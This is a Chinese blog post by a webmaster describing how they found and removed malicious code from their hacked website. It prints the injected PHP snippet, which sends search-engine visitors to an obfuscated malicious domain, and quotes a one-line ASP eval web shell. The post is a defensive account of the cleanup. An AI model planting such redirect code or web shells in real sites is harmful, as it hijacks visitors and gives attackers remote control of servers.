國慶期間本來想給自己放幾天假的，因為網站的掛馬給泡湯了，打開網站首頁，使用瀏覽器的源代碼功能，發現自己網站的首頁多了很多木馬代碼，於是我連接FTP查看網站首頁的代碼中發現了這個掛馬代碼，下面我把代碼貼出來 ：
 

<?php
error_reporting(0);
if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REFERER']) )
{ echo '<script>window.location.href="http://www."+"tao"+"8s"+".in"+"fo";</script>';}

惡意的掛馬網址 www.tao8s.info

解釋一下：這個代碼是 PHP的代碼是一種條件性的掛馬，上面的google soso sogou baidu 都是掛馬的條件，意思就是當從 google soso...等等搜索引擎來的訪問客戶會自動在網頁上隱藏一行代碼也就是掛馬代碼。
 

訪問這個網站的用戶，一般都會被360和百度提示網站有風險和網站掛馬提示的，但是這個掛馬為什麼不提示呢? 這裡我給大家解密下，不要以為病毒都會被殺毒軟件殺掉，殺毒軟件也不是萬能的，就像警察抓小偷，警察不知道小偷的特徵怎麼去抓捕呢？ 殺毒和這個道理一樣的是根據特徵來的，有一些病毒出來的早，沒有被殺毒跟蹤到，所以360和百度也不會有什麼安全掛馬提示（一般業界人士稱“免殺病毒”。
 

說的有點多，言歸正傳。說點乾貨，那遇到這種情況咋辦啊，我的解決辦法就是先查清楚病因後除根，於是用FTP把網站程序全部打包下來然後一個一個文件的檢查，看看有沒有其他名字的文件，我在網上查到一般木馬文件名字都是global.asa global.asp 啥的，反正是些不熟悉的文件名，檢查了一下沒有發現特殊的文件名字，於是開始檢查代碼方面，都知道程序員寫代碼能累死，於是在百度上查到了一個叫esafe.tw的網站掛馬代碼檢查工具，這個工具是專門檢查掛馬代碼的和木馬代碼的。我把網站程序的代碼文件放到工具檢測了一下，發現了木馬代碼 <%eval request("hack")%> eval的特徵代碼，找到這個代碼後我就給刪除了，重複的用掛馬檢測工具檢查了好幾遍，沒有發現問題後，我這才放心。連接到FTP，把網站程序重新上傳了一遍，網站這才穩定下來。
 

折騰了我一天，連午睡都沒撈著睡，困死我了。以上就是我網站被木馬後的解決經歷，有什麼不懂的也隨時歡迎大家與我交流探討。